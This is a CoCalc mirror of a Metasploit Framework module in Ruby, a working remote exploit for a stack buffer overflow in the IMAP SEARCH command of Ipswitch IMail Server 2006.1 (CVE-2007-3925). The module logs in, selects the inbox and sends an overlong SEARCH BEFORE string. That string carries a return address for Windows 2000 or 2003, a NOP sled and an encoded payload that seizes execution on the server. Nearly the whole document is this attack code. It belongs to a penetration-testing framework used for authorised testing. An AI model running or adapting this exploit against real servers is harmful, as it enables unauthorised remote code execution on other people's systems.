CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/imap/ipswitch_search.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Imap

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Ipswitch IMail IMAP SEARCH Buffer Overflow',

14
      'Description'    => %q{

15
          This module exploits a stack buffer overflow in Ipswitch IMail Server 2006.1 IMAP SEARCH

16
        verb. By sending an overly long string, an attacker can overwrite the

17
        buffer and control program execution.

18
        In order for this module to be successful, the IMAP user must have at least one

19
        message.

20
      },

21
      'Author'         => [ 'MC' ],

22
      'License'        => MSF_LICENSE,

23
      'References'     =>

24
        [

25
          [ 'CVE', '2007-3925' ],

26
          [ 'OSVDB', '36219' ],

27
          [ 'BID', '24962' ],

28
        ],

29
      'Privileged'     => true,

30
      'DefaultOptions' =>

31
        {

32
          'EXITFUNC' => 'thread',

33
        },

34
      'Payload'        =>

35
        {

36
          'Space'    => 400,

37
          'BadChars' => "\x00\x0a\x0d\x20\x0b\x09\x0c",

38
          'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",

39
        },

40
      'Platform'       => 'win',

41
      'Targets'        =>

42
        [

43
          [ 'Windows 2000 Pro SP4 English',   { 'Ret' => 0x77f81be3 } ],

44
          [ 'Windows 2003 SP0 English',       { 'Ret' => 0x77c5cee8 } ]

45
        ],

46
      'DefaultTarget'  => 0,

47
      'DisclosureDate' => '2007-07-18'))

48
  end

49


50
  def exploit

51


52
    sploit =  "a002 SEARCH BEFORE " + "<" + rand_text_english(87)

53
    sploit << [target.ret].pack('V') + make_nops(20) + payload.encoded + ">"

54


55
    info = connect_login

56


57
    if (info == true)

58
      print_status("Trying target #{target.name}...")

59
      sock.put("a001 SELECT INBOX\r\n")

60
      sock.get_once(-1, 3)

61
      sock.put(sploit + "\r\n")

62
    else

63
      print_status("Not falling through with exploit")

64
    end

65


66
    handler

67
    disconnect

68


69
  end

70
end

71


72